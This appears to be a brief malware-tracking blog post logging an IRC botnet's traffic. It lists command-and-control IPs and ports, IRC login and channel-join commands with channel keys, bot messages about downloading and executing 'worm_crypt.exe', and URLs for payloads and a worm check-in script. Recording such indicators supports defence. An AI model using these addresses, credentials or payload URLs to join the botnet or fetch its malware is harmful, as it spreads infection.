46.105.241.160(aryan bot hosted in United Kingdom Ovh Systems)

Remote Host Port Number
199.15.234.7 80

64.62.181.43 80

65.254.248.151 80

46.105.241.160 6667 PASS none or PASS passwd

MODE New{US-XP-x86}8220715 +iMm
JOIN #xxARYANxx# styggen
JOIN #dl
PRIVMSG #dl :[AryaN]: Downloading File: “http://ohnull.fileave.com/worm_crypt.exe”
PRIVMSG #dl :[AryaN]: Successfully Downloaded File To: “C:Documents and SettingsUserNameApplication Data187831163825520.exe”
PRIVMSG #dl :[AryaN]: Successfully Executed Process: “C:Documents and SettingsUserNameApplication Data187831163825520.exe”
NICK New{US-XP-x86}8220715
USER 8220715 “” “8220715” :8220715

NICK New{US-XP-x86}1124207
USER 1124207 “” “1124207” :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
PONG :asldfj.servmenow

NICK n{US|XPa}zfsweqj
USER zfsweqj 0 0 :zfsweqj
JOIN #ngr ngrBot

The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://ohnull.fileave.com/fudaryan.exe
http://ohnull.fileave.com/worm_crypt.exe
http://propcworx.com/icons/worm.php?logdata=Downloaded%20payload
http://propcworx.com/icons/worm.php?logdata=Executed%20payload
http://propcworx.com/icons/worm.php?logdata=Infected
http://propcworx.com/icons/worm.php?logdata=RAR%20archives%20infected

hosting infos:
http://whois.domaintools.com/46.105.241.160

Categories: Uncategorized